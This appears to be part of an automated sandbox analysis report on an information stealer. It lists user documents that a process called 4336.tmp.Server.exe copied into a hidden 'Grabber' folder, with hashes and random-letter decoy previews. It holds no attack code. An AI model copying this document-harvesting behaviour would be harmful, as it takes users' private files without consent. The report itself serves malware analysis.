Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

